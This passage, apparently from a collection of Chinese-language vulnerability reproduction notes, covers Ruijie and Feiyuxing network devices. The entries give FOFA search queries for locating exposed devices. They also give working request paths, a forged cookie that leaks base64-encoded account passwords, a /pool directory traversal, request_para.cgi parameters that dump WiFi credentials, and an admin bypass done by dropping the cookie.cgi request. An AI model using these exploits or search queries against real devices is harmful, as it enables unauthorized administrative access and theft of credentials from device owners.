admin管理员的密码,尝试直接请求 32 | 33 | ```plain 34 | http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml 35 | 36 | Cookie添加 37 | Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest 38 | ``` 39 | 40 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110921729.png) 41 | 42 | 直接获得所有的账户的等级标志和base64加密的账号密码 43 | -------------------------------------------------------------------------------- /网络设备漏洞/锐捷 云课堂主机 pool 目录遍历漏洞.md: -------------------------------------------------------------------------------- 1 | # 锐捷 云课堂主机 pool 目录遍历漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 锐捷云课堂主机存在目录遍历漏洞,通过访问get请求/pool/,即可读取目录.导致敏感信息泄露. 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 锐捷云课堂 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="Ruijie" && "云课堂主机" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 访问 http://xxx.xxx.xxx.xxx/pool 造成目录遍历 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110919267.png) -------------------------------------------------------------------------------- /网络设备漏洞/飞鱼星 企业级智能上网行为管理系统 权限绕过信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # 飞鱼星 企业级智能上网行为管理系统 权限绕过信息泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 飞鱼星 企业级智能上网行为管理系统 存在权限绕过以及信息泄露漏洞,可以获取管理员权限以及用户密码 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 飞鱼星 企业级智能上网行为管理系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="飞鱼星企业级智能上网行为管理系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 权限绕过参考上一篇 **飞鱼星 家用智能路由 cookie.cgi 权限绕过** 22 | 23 | 信息泄露POC 24 | 25 | ```plain 26 | /request_para.cgi?parameter=wifi_info #获取ALL WIFI账号密码 27 | /request_para.cgi?parameter=wifi_get_5g_host #获取5GWIFI账号密码 28 | /request_para.cgi?parameter=wifi_get_2g_host #获取2GWIFI账号密码 29 | ``` 30 | 31 | 32 | 33 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162236795.png) 34 | 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /网络设备漏洞/飞鱼星 家用智能路由 cookie.cgi 权限绕过.md: -------------------------------------------------------------------------------- 1 | # 飞鱼星 家用智能路由 cookie.cgi 权限绕过 2 | 3 | ## 漏洞描述 4 | 5 | 飞鱼星 家用智能路由存在权限绕过,通过Drop特定的请求包访问未授权的管理员页面 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 飞鱼星 家用智能路由 11 | 飞鱼星 企业级智能上网行为管理系统 12 | ``` 13 | 14 | ## FOFA 15 | 16 | ``` 17 | title="飞鱼星家用智能路由" 18 | ``` 19 | 20 | ## 漏洞复现 21 | 22 | 登录页面如下 23 | 24 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162236515.png) 25 | 26 | 访问 index.html 时会请求 cookie.cgi 27 | 28 | ```plain 29 | http://xxx.xxx.xxx.xxx/index.html 30 | ``` 31 | 32 | 页面抓包 Drop掉 cookie.cgi 33 | 34 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162236102.png) 35 | 36 | 跳转后台获取了权限 37 | 38 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162236589.png) --------------------------------------------------------------------------------